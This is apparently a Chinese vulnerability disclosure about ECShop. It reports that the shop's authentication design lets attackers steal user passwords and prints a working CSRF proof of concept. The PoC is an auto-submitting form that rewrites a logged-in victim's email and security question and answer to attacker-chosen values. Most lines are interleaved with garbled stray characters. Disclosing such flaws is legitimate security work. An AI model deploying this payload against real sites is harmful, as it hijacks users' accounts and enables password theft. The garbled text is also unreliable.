简要描述:2 ^- {1 b/ [( E0 {' m
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现' h. B: g h& M1 Z
9 A, Y) O, y) w. h9 S' m; ?1 yDemo For:http://www.wooyun.org/bug.php?action=view&id=395
* i1 y# H% I0 v* K0 g4 |; @9 i1 S' T
详细说明:
) j" t% |( _" t. _7 r. x利用csrf和xss可以突破官方所说的“障碍”
. l8 Z v$ g# i6 [1 |2 m1 [2 ^& Q$ ^2 D: }xss版本已经有人说明" ?, t; K3 u3 X( z
这里给出csrf版本
3 E: \+ o5 l6 s" \: b, A# B
5 z2 R" i2 L& [漏洞证明:/ a# s3 q1 @. D2 d
<html>* q6 W$ Q+ l1 y% [6 U; n
<body>4 r5 q9 R+ s; [
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">4 |% @3 n9 H7 l
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">* M$ c; C% C# q, |/ o
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 F1 a6 j {7 ]6 m8 i J F<INPUT TYPE="text" NAME="sel_question" value="ecshop">
2 M7 i% \# M3 J0 j<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
- V& m1 |' Q$ K3 ~2 w9 \</body>' |+ Z3 u% B( P; Z1 a; i
<script>
, P- J) e5 I: e1 a9 i5 ddocument.forms[0].submit();
. K6 f6 D7 [' K- N3 W8 S- Z( X- X</script>8 q7 R3 _; l0 W- p* _4 d
</html>
- t* q A! A" o2 J# x/ t构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
$ B" T$ Z3 B: V( D7 f2 K
) F' ^! f2 y7 Q8 r7 h! F9 K* N" q |